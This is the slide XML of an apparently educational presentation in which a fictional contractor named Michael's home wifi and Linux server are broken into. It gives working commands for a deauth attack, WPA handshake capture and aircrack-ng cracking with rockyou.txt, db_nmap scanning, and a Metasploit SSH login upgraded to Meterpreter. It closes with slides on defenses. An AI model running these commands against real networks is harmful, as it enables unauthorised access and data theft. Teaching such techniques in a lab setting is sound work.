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6553d878f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6553d878f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3d76c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83d76c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6553d878f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6553d878f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83d76c89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83d76c8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83d76c8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83d76c8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3d76c8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3d76c8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83d76c8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83d76c8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3d76c8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3d76c8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83d76c8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83d76c8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3d76c89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83d76c89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83d76c8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83d76c8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6553d878f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6553d878f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83d76c89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83d76c89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83d76c8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83d76c8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83d76c89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83d76c8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6553d878f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6553d878f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6553d878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6553d878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6553d878f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6553d878f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553d878f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553d878f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553d878f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6553d878f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6553d878f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6553d878f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553d878f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553d878f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BSSID - Basic Service Set Identifier - Digital MAC address of sorts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jpg"/><Relationship Id="rId5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://tinyurl.com/zackheaton10jun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bSY00m1fvB9lWK1fgqHtm2WSxMF0CFcV/view?usp=sharing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128713"/>
            <a:ext cx="48196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22425" y="368475"/>
            <a:ext cx="8659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USING KALI-LINUX TO OBTAIN ACCESS AND EXFILTRATE EVIDENCE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42250" y="4206850"/>
            <a:ext cx="8659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 presentation by Zack Heaton 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Cracking Michael’s Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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packet and data captured in the .cap file can now we used by Aircrack-ng to search for the password. It requires a word list and works similar to JTR or Hydra.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$ aircrack-ng -w ~/Desktop/rockyou.txt -b E8:91:20:F6:5F:F5 WPAcrack-01.cap</a:t>
            </a:r>
            <a:endParaRPr sz="17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Michael’s Network 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IP - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[ifconfig]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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[msfdb init]     [msfconsole]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NMAP Scan   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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[db_nmap -T5 -n -sn 192.168.0.0/24].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NMAP -A Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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[db_nmap -T5 -n -A 192.168.0.0/24]</a:t>
            </a:r>
            <a:endParaRPr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Hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hosts]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Services</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [services]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Analyze the output.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Access via SSH Exploit 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Search SSH_Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> exploits </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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Set RHOSTS 192.168.0.30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SET USERNAME michael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SET PASSWORD michael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EXPLOIT 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Sessions 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Sessions -u 4 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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sessions -i 8 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Meterpreter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175" y="427700"/>
            <a:ext cx="2428150" cy="2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on Michael’s Linux Server? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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25" y="1017725"/>
            <a:ext cx="67961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on Michael’s Linux Server?  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25" y="968175"/>
            <a:ext cx="3676275" cy="20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0" y="968176"/>
            <a:ext cx="3676275" cy="20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0" y="3084626"/>
            <a:ext cx="3676275" cy="20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25" y="3084628"/>
            <a:ext cx="3676275" cy="20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8550" y="1933850"/>
            <a:ext cx="2066900" cy="20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Upgrading Security - Better Passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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36825"/>
            <a:ext cx="8839198" cy="178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1017725"/>
            <a:ext cx="3335762" cy="18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2" y="1017725"/>
            <a:ext cx="3528740" cy="18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228300" y="4633175"/>
            <a:ext cx="8661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20 Character - Alphanumeric With Symbols. Different password for every login. </a:t>
            </a:r>
            <a:endParaRPr b="1"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Upgrading Security - Disabling SSH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900" y="1383238"/>
            <a:ext cx="2377024" cy="23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362600" y="4096000"/>
            <a:ext cx="7507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SSH is too risky of a protocol/tool to leave open and unattended if security is a concern. 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Michael is a government contractor. He has been working for ------ for ---- years. In the recent months his behavior at work has shifted and there is suspicion that he may or may not be collaborating with a foreign nation state. Some general </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>surveillance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> of Michael has already taken place and at this point a clandestine operation to explore his home computer has been sanctioned. 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17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Upgrading Security - Network Architecture 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362600" y="4096000"/>
            <a:ext cx="7507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There are methods using such as firewalls, DMZs, and subnets, physical location changes that could improve security. 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75" y="1170125"/>
            <a:ext cx="3650959" cy="27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9" y="1198338"/>
            <a:ext cx="5035842" cy="274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Upgrading Security - Encryption &amp; Social Engineering </a:t>
            </a:r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4673475" y="1170125"/>
            <a:ext cx="3747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 to HTTPS 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Encrypting plain text contents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(MD5, SHA, or similar)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Cameras outside his house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b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Network Name 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60213" cy="27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711775" y="550625"/>
            <a:ext cx="78966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QUESTIONS / PREGUNTAS / FRAGEN</a:t>
            </a:r>
            <a:endParaRPr b="1"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504025"/>
            <a:ext cx="24003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443175" y="3746825"/>
            <a:ext cx="8057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 u="sng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tinyurl.com/zackheaton10june</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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Steps: Scanning for Networks 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a laptop or cell phone to scan wifi networks is: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Easy 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Stealthy </a:t>
            </a:r>
            <a:endParaRPr sz="2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428325" cy="212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1170288"/>
            <a:ext cx="1428325" cy="2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0" y="3445150"/>
            <a:ext cx="2969775" cy="15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Aircrack-ng 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5402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A tool/suite of tools (airmon, airodump, aireplay, Aircrack) that can detect and discover wifi credentials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does it work?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Places the network adapter into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“monitor” mode and searches for signals.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its legal uses?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It can be used help people crack passwords that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forgotten.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="14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250" y="1450875"/>
            <a:ext cx="3987299" cy="224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Airmon &amp; Airodump on Michael’s Network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Airmon is a function of the aircrack-ng. It performs a similar function to A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>crylic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.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[sudo airmon-ng start wlan0mon]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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Airodump takes an assigned BSSID and “dumps” all into a .cap file.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[$ sudo airodump-ng -c 11 --bssid E8:91:20:F6:5F:F5 -w WPAcrack wlan0mon --ignore-negative-one].</a:t>
            </a:r>
            <a:endParaRPr sz="17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5250975" y="1443250"/>
            <a:ext cx="3208800" cy="353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Operation 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Airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is capturing traffic and what we need is an authentication packet. We can speed this up with the command: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sudo aireplay-ng --deauth 25 -a E8:91:20:F6:5F:F5 -c 50:32:37:A5:95:86 mon0 --ignore-negative-one</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="F1C232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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050" y="2916050"/>
            <a:ext cx="3171903" cy="17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